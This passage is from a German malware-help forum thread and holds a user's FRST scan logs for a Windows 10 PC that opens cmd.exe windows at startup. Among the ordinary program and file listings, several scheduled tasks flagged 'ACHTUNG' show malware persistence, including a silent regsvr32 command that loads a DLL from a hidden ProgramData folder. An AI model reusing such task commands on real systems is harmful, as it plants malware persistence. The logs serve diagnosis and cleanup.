2017-12-12 23:00 - 2017-11-26 11:36 - 000444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-12-12 23:00 - 2017-11-26 11:36 - 000351232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-12-12 23:00 - 2017-11-26 11:36 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-12-12 23:00 - 2017-11-26 11:35 - 000557056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9on12.dll
2017-12-12 23:00 - 2017-11-26 11:35 - 000293888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-12-12 23:00 - 2017-11-26 11:35 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2017-12-12 23:00 - 2017-11-26 11:35 - 000242176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExecModelClient.dll
2017-12-12 23:00 - 2017-11-26 11:32 - 011923456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-12-12 23:00 - 2017-11-26 11:31 - 000660480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-12-12 23:00 - 2017-11-26 11:31 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2017-12-12 23:00 - 2017-11-26 11:30 - 004385280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-12-12 23:00 - 2017-11-26 11:30 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-12-12 23:00 - 2017-11-26 11:29 - 002869760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-12-12 23:00 - 2017-11-26 11:29 - 000823808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-12-12 23:00 - 2017-11-26 11:28 - 004249600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-12-12 23:00 - 2017-11-26 11:24 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-12-12 23:00 - 2017-11-26 11:24 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acppage.dll
2017-12-12 23:00 - 2017-11-19 08:35 - 003331520 _____ C:\WINDOWS\system32\Windows.Mirage.dll
2017-12-12 23:00 - 2017-11-19 03:20 - 002491112 _____ C:\WINDOWS\SysWOW64\Windows.Mirage.dll
2017-12-06 17:16 - 2017-12-06 17:16 - 001662795 _____ C:\Users\Gaming\Downloads\Bestellkatalog_Kunstkoeder.xlsx

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2018-01-03 23:03 - 2016-02-19 15:24 - 000000000 ____D C:\ProgramData\987623d8
2018-01-03 23:00 - 2017-09-29 14:44 - 000000000 ____D C:\WINDOWS\INF
2018-01-03 22:58 - 2017-11-30 15:27 - 002425188 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2018-01-03 22:58 - 2017-09-30 15:35 - 001110938 _____ C:\WINDOWS\system32\perfh007.dat
2018-01-03 22:58 - 2017-09-30 15:35 - 000251500 _____ C:\WINDOWS\system32\perfc007.dat
2018-01-03 22:51 - 2016-11-22 16:42 - 000000000 ____D C:\Users\Gaming\AppData\LocalLow\Mozilla
2018-01-03 22:50 - 2017-11-30 15:24 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-01-03 22:50 - 2017-11-30 15:20 - 000000000 ____D C:\Users\Gaming
2018-01-03 22:50 - 2017-11-30 15:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-01-03 22:50 - 2017-09-29 14:46 - 000000000 ___HD C:\Program Files\WindowsApps
2018-01-03 22:50 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-01-03 22:50 - 2017-07-15 11:30 - 000000000 ____D C:\ProgramData\NVIDIA
2018-01-03 22:43 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\DeliveryOptimization
2018-01-03 22:40 - 2015-12-26 18:00 - 000000000 ____D C:\Users\Gaming\AppData\Roaming\TS3Client
2018-01-03 22:36 - 2017-11-30 15:46 - 000000000 ___RD C:\Users\Gaming\3D Objects
2018-01-03 22:36 - 2015-07-16 16:49 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-01-03 22:35 - 2017-11-30 15:18 - 000222120 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\TextInput
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\system32\appraiser
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\ShellExperiences
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\Provisioning
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\Program Files\Windows Defender
2018-01-03 22:35 - 2017-09-29 14:46 - 000000000 ____D C:\PerfLogs
2018-01-03 22:35 - 2017-09-29 09:45 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-01-03 22:35 - 2017-09-29 09:45 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-01-03 22:34 - 2017-01-27 08:08 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-01-03 22:34 - 2015-12-08 19:31 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-01-03 22:27 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\Registration
2018-01-03 19:54 - 2017-11-30 15:24 - 000004174 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{0E5D1D49-26C6-461B-A6B0-FC42112B7603}
2018-01-03 16:22 - 2016-11-19 10:20 - 000425607 _____ C:\WINDOWS\system32\InstallUtil.InstallLog
2017-12-30 23:02 - 2017-09-26 22:38 - 000000000 ____D C:\Users\Gaming\AppData\Roaming\OBS
2017-12-26 21:03 - 2017-09-07 10:17 - 000000000 ____D C:\Program Files (x86)\Steam
2017-12-23 17:49 - 2015-12-26 18:00 - 000000000 ____D C:\Users\Gaming\AppData\Local\TeamSpeak 3 Client
2017-12-22 21:57 - 2017-11-30 21:29 - 000000000 ____D C:\ProgramData\78e918d0-24d7-1
2017-12-22 21:56 - 2017-11-30 21:29 - 000000000 ____D C:\ProgramData\78e918d0-1831-0
2017-12-22 21:56 - 2017-11-02 21:33 - 000000000 ____D C:\ProgramData\{F72DD65B-4086-61F0-9A1A-947A4A562688}
2017-12-17 21:56 - 2017-09-29 14:46 - 000000000 ____D C:\WINDOWS\rescache
2017-12-16 22:09 - 2017-09-29 14:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-12-13 21:40 - 2017-11-30 15:20 - 000000000 ____D C:\Users\Gaming\AppData\Local\Packages
2017-12-12 23:04 - 2015-12-10 03:52 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-12-12 23:03 - 2017-10-10 21:32 - 133326408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-12-12 23:03 - 2015-12-10 03:52 - 133326408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-12-12 23:01 - 2017-09-29 14:42 - 001587200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-12-12 23:01 - 2017-09-29 14:41 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-12-12 23:01 - 2017-09-29 14:41 - 000139672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2017-12-12 23:01 - 2017-09-29 14:41 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2017-12-11 22:00 - 2017-11-13 23:45 - 000000231 _____ C:\Users\Gaming\Desktop\Crackit LAN Party E-Mail.txt
2017-12-11 17:55 - 2017-11-30 15:16 - 000000000 ____D C:\Windows.old
2017-12-05 21:58 - 2017-11-30 15:24 - 000003370 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2799811712-2181285835-3472818555-1001
2017-12-05 21:58 - 2015-12-08 18:55 - 000002397 _____ C:\Users\Gaming\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-12-05 21:58 - 2015-12-08 18:55 - 000000000 ___RD C:\Users\Gaming\OneDrive

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2018-01-03 17:44

==================== Ende von FRST.txt ============================

Alt 03.01.2018, 23:37   #2
ViperGaming
 
cmd.exe spam nach hochfahren von Windows 10 - Standard

cmd.exe spam nach hochfahren von Windows 10



Addition.txtFRST Additions Logfile:
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02.01.2018
durchgeführt von Gaming (03-01-2018 23:03:59)
Gestartet von C:\Users\Gaming\Downloads
Windows 10 Home Version 1709 16299.125 (X64) (2017-11-30 14:35:56)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2799811712-2181285835-3472818555-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2799811712-2181285835-3472818555-503 - Limited - Disabled)
Gaming (S-1-5-21-2799811712-2181285835-3472818555-1001 - Administrator - Enabled) => C:\Users\Gaming
Gast (S-1-5-21-2799811712-2181285835-3472818555-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-2799811712-2181285835-3472818555-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 382.64 - NVIDIA Corporation) Hidden
Apple Application Support (32-Bit) (HKLM-x32\...\{D811A40A-9791-497C-B9DC-2D89C8E95EA1}) (Version: 6.1 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{8B47B514-F5D2-4E0D-B951-6E250618A7CD}) (Version: 6.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{31A0B634-BCF4-4D3F-8336-87FEACFEE142}) (Version: 11.0.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{C1BBFD2A-BCDD-45B3-8C0B-66BD434970A8}) (Version: 2.4.8.1 - Apple Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
DesktopMediaService (HKLM\...\{1238A4D4-8824-43D9-A27F-605C83C873E1}) (Version: 2.0.40 - jsstmedia)
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.5.1 - Dolby Laboratories Inc)
Driver and Application Installation (HKLM-x32\...\{6EC299C6-074C-4529-8D5F-2798584BB27B}) (Version: 2.02.0826 - Lenovo)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.6.0.1036 - Intel Corporation)
Intel(R) Online Connect Software Asset Manager (HKLM-x32\...\{AE956AB9-CD98-4F1E-8B9E-C3C66E290D64}) (Version: 3.4.2072 - Intel Corporation) Hidden
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{c7f54569-0018-439c-809a-48046a4d4ebc}) (Version: 10.1.1.9 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
iTunes (HKLM\...\{24607015-8D34-4AF3-9092-AC83847AE073}) (Version: 12.7.1.14 - Apple Inc.)
LED Control Center (HKLM-x32\...\{528BDFE8-601B-485D-95AD-95A4C9DFB820}_is1) (Version: 1.0.0.0707 - Lenovo, Inc.)
Lenovo Accelerator Application (HKLM-x32\...\{10672FE6-3D50-4F79-B0C7-A5573A5D415D}) (Version: 2.2.0.0812 - Lenovo)
Lenovo Blacksilk USB Keyboard Driver (HKLM-x32\...\{B266E062-D6C5-485B-B426-51B152B041A6}) (Version: V1.6.13.0724 - Lenovo)
Lenovo Experience Improvement (HKLM\...\LenovoExperienceImprovement) (Version: 2.0.9.0 - Lenovo)
Lenovo Photos (HKLM-x32\...\Lenovo Photos) (Version: 6.0.4 - CEWE Stiftung u Co. KGaA)
Lenovo Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.) Hidden
Lenovo Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.)
Lenovo PowerDVD12 (HKLM-x32\...\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5320.55 - CyberLink Corp.) Hidden
Lenovo PowerDVD12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5320.55 - CyberLink Corp.)
Lenovo Product Demo (HKLM-x32\...\{4956FF73-EC6A-4735-9099-98B1C2FFDC2E}) (Version: 1.0.5 - Lenovo)
Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.015.00 - Lenovo)
Lenovo Rescue System (HKLM\...\{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 4.0.0.4212 - CyberLink Corp.) Hidden
Lenovo Rescue System (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 4.0.0.4212 - CyberLink Corp.)
Lenovo Solution Center (HKLM\...\{A5591EC4-8AD6-48EE-9F8D-FACFA8BA4E35}) (Version: 3.0.002.00 - Lenovo)
Manual (HKLM-x32\...\{693F92E5-37D1-46B7-A0D6-19A74A2FD0EC}) (Version: 1.00.0701 - Lenovo)
Metric Collection SDK 35 (HKLM-x32\...\{C2B5B5B0-2545-4E94-B4BA-548D4BF0B196}) (Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4693.1005 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\OneDriveSetup.exe) (Version: 17.3.7131.1115 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mozilla Firefox 57.0.3 (x64 de) (HKLM\...\Mozilla Firefox 57.0.3 (x64 de)) (Version: 57.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.3.6569 - Mozilla)
NVIDIA HD-Audiotreiber 1.3.34.26 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.26 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0329 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0329 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 10.0.0.128 - Qualcomm Atheros)
Qualcomm Atheros 61x4 Wireless LAN Installer (HKLM-x32\...\{20CA507E-24AA-4741-87CF-CC1B250790B7}) (Version: 11.0.0.041 - Qualcomm Atheros)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.10.6 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7586 - Realtek Semiconductor Corp.)
Russian Fishing 4 (HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\de.rf4game.rf4_launcher_de) (Version: 4.0.9185 - Russian Fishing Spb LLC)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.5.5.0 - Lenovo)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.83369 - TeamViewer)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Windows-Treiberpaket - NVIDIA (nvlddmkm) Display  (07/22/2015 10.18.13.5362) (HKLM\...\81C36D5B443FFB6F528F76BD424D750C53ADF10E) (Version: 07/22/2015 10.18.13.5362 - NVIDIA)
Windows-Treiberpaket - NVIDIA Corporation (NVHDA) MEDIA  (04/16/2015 1.3.34.3) (HKLM\...\E1EF4D4E1E41BA85DB6DA51424B73AE1B3F0056A) (Version: 04/16/2015 1.3.34.3 - NVIDIA Corporation)
Windows-Treiberpaket - Qualcomm Atheros Communications (BtFilter) Bluetooth  (07/30/2015 10.0.0.128) (HKLM\...\A5CCCC0E19E53F3E41C924FAF6C55E350EFB0BFA) (Version: 07/30/2015 10.0.0.128 - Qualcomm Atheros Communications)
Windows-Treiberpaket - Qualcomm Atheros Communications Inc. (Qcamain10x64) Net  (06/24/2015 12.0.0.102) (HKLM\...\4487BC319063A97DD4FDC3A8F68BADD5E5BA0B49) (Version: 06/24/2015 12.0.0.102 - Qualcomm Atheros Communications Inc.)
Windows-Treiberpaket - Realtek (rt640x64) Net  (05/05/2015 10.001.0505.2015) (HKLM\...\6A304520C2F25CD034E477A379C47308AA84A2DC) (Version: 05/05/2015 10.001.0505.2015 - Realtek)
Windows-Treiberpaket - Realtek Semiconduct Corp. (RTSUER) USB  (05/11/2015 6.3.9600.31213) (HKLM\...\8B76AD3EEC17650CAFD6EEFD418B2454C10BC71B) (Version: 05/11/2015 6.3.9600.31213 - Realtek Semiconduct Corp.)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers1: [SHAREit.FileContextMenuExt] -> {430BD134-576D-4E75-87CD-0F5C6221A82B} => C:\Program Files (x86)\Lenovo\SHAREit\ShellEx\ShellExt64.dll [2015-07-12] (Lenovo)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers4: [SHAREit.FileContextMenuExt] -> {430BD134-576D-4E75-87CD-0F5C6221A82B} => C:\Program Files (x86)\Lenovo\SHAREit\ShellEx\ShellExt64.dll [2015-07-12] (Lenovo)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0d9146be-1fe7-41f2-90f1-d9145daee17e} - kein Dateipfad
Task: {0DBD4B45-5025-4749-BF43-8DC1B489C5B9} - System32\Tasks\{A5263180-128D-862B-B405-77378D8054B9} => C:\ProgramData\{49AA240D-FE01-93A6-8F15-C88DF2D48BAE}\2DBF930F-9A14-24A4-1322-454EE11FAC79.exe [2018-01-03] () <==== ACHTUNG
Task: {0EB7F83A-C1FC-4246-9F88-E7229BBAF901} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\678fd841-6f0e-4c94-bb64-88fd3dd65b3a => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-11-12] (Lenovo Group Limited)
Task: {0F3E872B-4D0E-4A1B-A6EC-BD8815DAF7D6} - System32\Tasks\IntelIOC-Upgrade-f1c8187b-2653-47cd-a9be-b554b98f68a7-Logon => C:\Program Files (x86)\Intel\Intel(R) Online Connect Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2016-09-29] (Intel Corporation)
Task: {1149ce9c-2525-47e9-a11e-86959987190e} - kein Dateipfad
Task: {117A7ADD-6856-4245-B930-2C33F16BB07E} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSCService.exe [2015-07-01] (Lenovo)
Task: {159E361D-706B-4D10-90F9-F79D07E167D0} - System32\Tasks\DNSROSEVILLE => dnsroseville.exe <==== ACHTUNG
Task: {17D8DCEA-44CD-47B4-95C6-D2F637226A3D} - System32\Tasks\{9D4B8454-9256-45E2-0013-03D7F862B834} => C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\987623d8\f75b5544.dll" <==== ACHTUNG
Task: {18512D38-17BF-44FA-8C73-7F6B69800806} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2015-07-01] ()
Task: {18AED028-25F1-4428-9C33-B8C4FCAB5097} - System32\Tasks\PDVDServ12 Task => C:\Program Files (x86)\Lenovo\PowerDVD12\PDVD12Serv.exe [2015-05-20] (CyberLink Corp.)
Task: {32766CA2-9C98-4406-9D86-F116A86C8C84} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler  /v start /t reg_dword /d 1 /f /reg:32
Task: {35903864-F699-49D5-A279-C545AF5D334B} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe
Task: {36EFE2B0-02DF-4ABC-A8D9-9BDF53E5121B} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {3F9CA94A-4D75-4E87-AAE5-5EE797CD6197} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => C:\Windows\system32\rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"
Task: {471903B5-31B0-4FDC-A1A4-0B06CC4F4E49} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\a072cf7e-6b0d-461b-b905-48b8cfe40e14 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-11-12] (Lenovo Group Limited)
Task: {62AA4961-1AE4-41FC-97D3-8E089EA53F31} - System32\Tasks\{45C86229-AB67-40BE-D118-E97806F07533} => C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\987623d8\f75b5544.dll" <==== ACHTUNG
Task: {6539F1A1-B678-47E3-AB66-D7840054545E} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => %windir%\system32\sc.exe START ImControllerService
Task: {6C2735B1-B4E5-4174-BA7A-8CD96BCAA14D} - System32\Tasks\IntelIOC-Upgrade-f1c8187b-2653-47cd-a9be-b554b98f68a7 => C:\Program Files (x86)\Intel\Intel(R) Online Connect Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2016-09-29] (Intel Corporation)
Task: {6C3D15CA-1BFD-4A62-817D-99E9984A46DC} - System32\Tasks\Lenovo\SHUpdate => C:\Program Files (x86)\Lenovo\SHAREit\ShareitUpdater.exe [2015-07-12] ()
